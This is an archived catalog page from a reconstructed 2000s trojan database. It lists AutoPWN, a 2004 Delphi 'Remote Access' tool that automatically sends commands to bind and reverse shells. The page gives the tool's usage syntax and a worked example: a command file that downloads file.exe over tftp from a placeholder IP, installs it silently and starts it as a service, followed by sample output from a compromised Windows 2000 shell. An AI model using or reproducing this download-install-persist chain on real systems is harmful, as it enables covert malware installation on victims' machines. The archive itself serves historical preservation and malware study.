Archive Helmet Icon Archive A Reconstructed © MegaSecurity Database

AutoPWN

Released 21 years, 9 months ago. July 2004

Copyright © MegaSecurity

By Aphex


Informations
Author Aphex
Family AutoPWN
Category Remote Access
Version AutoPWN
Released Date Jul 2004, 21 years, 9 months ago.
Language Delphi
Additional Information
tested on Windows XP
December 06, 2004

Author Information / Description
AFX AutoPWN 0.1
http://www.iamaphex.cjb.net
[email protected]
Bind Shell Usage: autopwn -h:host -p:port -i:file
Reverse Shell Usage: autopwn -p:port -i:file

This tool can automate commands sent to a shell. 
Instead of typing repetitive commands everytime you are presented with a remote shell prompt, let this tool do the work for you.
It can interface with bind and reverse shells.

For example, you want to execute 3 commands everytime a new shell connects to you. In a file cmds.txt you place your 3 commands:

  tftp -i XX.XXX.XXX.XXX get file.exe
  file.exe /install /silent
  net start FileExeService

Then at the command prompt you type:

  C:\>autopwn -p:888 -i:cmds.txt

You will see the following:

  [AUTOPWN] Loading commands...
  [AUTOPWN] Commands loaded.
  [AUTOPWN] Listening for shell connections...

  [AUTOPWN] Incomming shell connection...
  Microsoft Windows 2000 [Version 5.00.2195]
  (C) Copyright 1985-2000 Microsoft Corp.

  C:\WINNT\system32>tftp -i XX.XXX.XXX.XXX get file.exe
  Transfer successful: 191488 bytes in 30 seconds, 6382 bytes/s

  C:\WINNT\system32>file.exe /install /silent

  C:\WINNT\system32>net start FileExeService
  The FileExeService service is starting.
  The FileExeService service was started successfully.

  C:\WINNT\system32>
  [AUTOPWN] Shell connection terminated.
  
Aphex

This archive is an almost-complete reconstruction of the legendary Mega Security (also known as Kobayashi), a premier 90s-era "Trojan Database" where malware authors once showcased their work. After a decade offline, the site was brought back in August 2024 by its original creator, MasterRat, who authorized the Malware Gallery to host this modernized, searchable version of the collection. While the original site remains available for those seeking a nostalgic, old-school experience, we are proud to continue its legacy here. Full credit and thanks go to MasterRat and the retired Mega Security staff for their years of dedicated work in cataloging these historical samples.